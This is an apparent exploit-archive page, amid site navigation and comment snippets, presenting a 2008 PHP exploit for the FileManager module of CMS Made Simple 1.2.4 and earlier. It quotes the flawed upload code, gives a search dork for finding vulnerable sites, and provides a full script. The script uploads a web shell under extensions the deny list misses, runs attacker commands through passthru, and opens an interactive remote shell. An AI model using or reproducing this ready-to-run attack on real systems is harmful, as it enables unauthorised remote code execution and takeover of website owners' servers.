SecuMania Security Portal - CMS Made Simple <= 1.2.4 (FileManager module) File Upload Exploit

Members Login

Rss Feeds

Get our latest content via RSS feeds.

Report a Vulnerability

Report a vulnerability or exploit that you have found to SecuMania.
vul[at]SecuMania.org

thanks

Basics of the One-Time-Pad

莆田SEO www.0594seo.com.cn 莆田SEM搜索引擎优化营销 www.ptsem.org.cn

Realsecure CGI Attack Subversion Vulnera...

hi webmaster,plz help me to find any information about account harvesting and traversal path attack ...

AR-Blog Comment HTML Injection Vulnerabi...

[…] self-propagating malware in the first place. Share this post: email it! | bookmark it! | digg ...

INDEXU <= 5.0.1 (admin_template_path) Re...

Hello Webmasters My name is Nikolai. I am making an organization for the protection internet users f...

Advanced Image Hosting (AIH) 2.1 Remote ...

good job you are the best . mgharba talmout :d

Online Rental Property Script <= 4.5 (pi...

Hello, The reported problem has been fixed. Regards, Catalina Danila Online Rent Customer Supp...

netOffice Dwins Authentication Bypass Vu...

Not Vulnerable: Luis Wang netOffice Dwins 1.3.1 visit website http://netofficedwins .sourceforge.ne...

BM Classifieds <= 20080409 Multiple SQL ...

Current version of script corrected. Security patch available to registered users in the user foru...

Nukedit 4.9.x Remote Create Admin Exploi...

But i think to protect the password is not needed because it's not used in the SQL-Execute statement...

Packet Storm

Packet Storm Last 10 Exploits

Packet Storm Last 10 Advisories

Packet Storm Last 10 Tools

Packet Storm Last 10 Miscellaneous Files

Packet Storm Headlines

Visits today:	566
Visits yesterday:	911
Visits month:	19660
Visits total:	65968
Pages total:	930381

CMS Made Simple <= 1.2.4 (FileManager module) File Upload Exploit

Monday, 12 May 2008

CMS Made Simple <= 1.2.4 (FileManager module) File Upload Exploit
Author:	EgiX
Date:	2008-05-12
Download:

<?php
 
/*
  ---------------------------------------------------------------------------
  CMS Made Simple <= 1.2.4 (FileManager module) Arbitrary File Upload Exploit
  ---------------------------------------------------------------------------
  
  author...: EgiX
  mail.....: n0b0d13s[at]gmail[dot]com
  
  link.....: http://www.cmsmadesimple.org/
  dork.....: "This site is powered by CMS Made Simple"
 
  [-] vulnerable code in /modules/FileManager/postlet/javaUpload.php
  
  21.  // Configuration ---------------------------------------------------------------
  22.  // Change the below path to the folder where you would like files uploading.
  23.  // e.g. "/home/yourname/myuploads/"
  24.  // or "c:\php\uploads\"
  25.  // Note, this MUST have the trailing slash.
  26.  $uploaddir = '[PATH TO UPLOAD DIRECTORY]';
  27.  // Whether or not to allow the upload of specific files
  28.  $allow_or_deny = true;
  29.  // If the above is true, then this states whether the array of files is a list of
  30.  // extensions to ALLOW, or DENY
  31.  $allow_or_deny_method = "deny"; // "allow" or "deny"
  32.  $file_extension_list = array("php","asp","pl");
  33.  // -----------------------------------------------------------------------------
  34.  if ($allow_or_deny){
  35.    if (($allow_or_deny_method == "allow" && !in_array(strtolower(array_pop(explode('.', $_FILES['userfile']['name']))), $file_extension_list))
  36.      || ($allow_or_deny_method == "deny" && in_array(strtolower(array_pop(explode('.', $_FILES['userfile']['name']))), $file_extension_list))){    
  37.      // Atempt to upload a file with a specific extension when NOT allowed.
  38.      // 403 error
  39.      header("HTTP/1.1 403 Forbidden");
  40.      echo "POSTLET REPLY\r\n";
  41.      echo "POSTLET:NO\r\n";
  42.      echo "POSTLET:FILE TYPE NOT ALLOWED\r\n";
  43.      echo "POSTLET:ABORT THIS\r\n"; // Postlet should NOT send this file again.
  44.      echo "END POSTLET REPLY\r\n";
  45.      exit;
  46.    }
  47.  }
  48.  if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir .$_FILES['userfile']['name']))
  49.  {
  50.    // All replies MUST start with "POSTLET REPLY", if they don't, then Postlet will
  51.    // not read the reply and will assume the file uploaded successfully.
  52.    echo "POSTLET REPLY\r\n";
  53.    // "YES" tells Postlet that this file was successfully uploaded.
  54.        echo "POSTLET:YES\r\n";
  55.    // End the Postlet reply
  56.    echo "END POSTLET REPLY\r\n";
  57.    exit;
  
  with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious
  PHP code due to $file_extension_list array don't contains many dangerous extensions (.jsp, .php3, .cgi, .dhtml, etc...)
  
*/
 
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
 
function http_send($host, $packet)
{
  $sock = fsockopen($host, 80);
  while (!$sock)
  {
    print "\n[-] No response from {$host}:80 Trying again...";
    $sock = fsockopen($host, 80);
  }
  fputs($sock, $packet);
  while (!feof($sock)) $resp .= fread($sock, 1024);
  fclose($sock);
  return $resp;
}
 
function upload()
{
  global $host, $path, $uploaddir, $file_ext;
  
  foreach ($file_ext as $ext)
  {
    print "\n[-] Trying to upload with .{$ext} extension...";
    
    $data  = "--12345\r\n";
    $data .= "Content-Disposition: form-data; name=\"userfile\"; filename=\".php.{$ext}\"\r\n";
    $data .= "Content-Type: application/octet-stream\r\n\r\n";
    $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
    $data .= "--12345--\r\n";
    
    $packet  = "POST {$path}modules/FileManager/postlet/javaUpload.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: ".strlen($data)."\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $packet .= $data;
    $html   = http_send($host, $packet);
    
    if (!eregi("POSTLET:YES", $html)) die("\n[-] Upload failed!\n");
    
    $packet  = "GET {$path}modules/FileManager/postlet/{$uploaddir}.php.{$ext} HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    $html    = http_send($host, $packet);
    
    if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
    
    sleep(1);
  }
  
  return false;
}
 
print "\n+----------------------------------------------------------------+";
print "\n| CMS Made Simple <= 1.2.4 Arbitrary File Upload Exploit by EgiX |";
print "\n+----------------------------------------------------------------+\n";
 
if ($argc < 2)
{
  print "\nUsage......: php $argv[0] host path";
  print "\nExample....: php $argv[0] localhost /cms/\n";
  die();
}
 
$host = $argv[1];
$path = $argv[2];
 
$uploaddir = rawurlencode("[PATH TO UPLOAD DIRECTORY]");
$file_ext  = array("dhtml", "phtml", "php3", "php5", "jsp", "jar", "cgi");
 
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
 
define(STDIN, fopen("php://stdin", "r"));
 
while(1)
{
  print "\ncmsmadesimple-shell# ";
  $cmd = trim(fgets(STDIN));
  if ($cmd != "exit")
  {
    $packet = "GET {$path}modules/FileManager/postlet/{$uploaddir}.php.{$ext} HTTP/1.0\r\n";
    $packet.= "Host: {$host}\r\n";
    $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
    $packet.= "Connection: close\r\n\r\n";
    $html   = http_send($host, $packet);
    //echo $html;
    if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
    $shell = explode("_code_", $html);
    print "\n{$shell[1]}";
  }
  else break;
}
 
?>